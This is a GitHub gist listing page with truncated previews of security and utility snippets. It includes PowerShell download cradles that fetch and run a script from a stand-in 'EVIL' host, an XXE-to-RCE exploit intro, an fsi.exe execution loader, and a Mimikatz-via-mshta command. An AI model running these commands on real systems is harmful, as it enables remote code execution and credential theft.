Skip to content

Instantly share code, notes, and snippets.

View ryanbaxendale's full-sized avatar

Ryan Baxendale ryanbaxendale

168 followers · 1.4k following
View GitHub Profile
@joernchen
joernchen / gist:3623896
Created September 4, 2012 17:34
XXE to RCE
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
@stephenhardy
stephenhardy / git-clearHistory
Created April 26, 2013 22:14
Steps to clear out the history of a git/github repository
-- Remove the history from
rm -rf .git
-- recreate the repos from the current content only
git init
git add .
git commit -m "Initial commit"
-- push to the github remote repos ensuring you overwrite history
git remote add origin git@github.com:<YOUR ACCOUNT>/<YOUR REPOS>.git
@raidzero
raidzero / rdump.py
Created March 5, 2014 23:31
Print all strings from android resources.arsc file
#!/usr/bin/python
import sys
DEBUG = False
HEADER_ONLY = False
if len(sys.argv) >= 2:
FILENAME = sys.argv[1]
if len(sys.argv) >= 3:
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active July 28, 2024 18:14
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@jgamblin
jgamblin / ut1mdiff.sh
Last active February 27, 2019 03:53
Download Umbrella's Top 1 Million Sites List For Last 2 Days And List New Sites
#!/bin/bash
day1=$(date --date="2 days ago" +"%Y"-"%m"-"%d")
day2=$(date --date="3 days ago" +"%Y"-"%m"-"%d")
mkdir -p ~/ut1m
cd ~/ut1m
#Get Yesterdays Data
printf "Getting $day1 Data\n"
cd ~/ut1m
mkdir $day1
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active July 29, 2024 10:25
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active June 23, 2024 20:29
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@NickTyrer
NickTyrer / fsharp.fsscript
Created September 3, 2017 09:19
fsi.exe inline execution
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()
@milo2012
milo2012 / getMoreDomains.py
Last active July 10, 2019 14:01
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
@chrismaddalena
chrismaddalena / mimikatz.sct
Created February 3, 2018 09:55
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>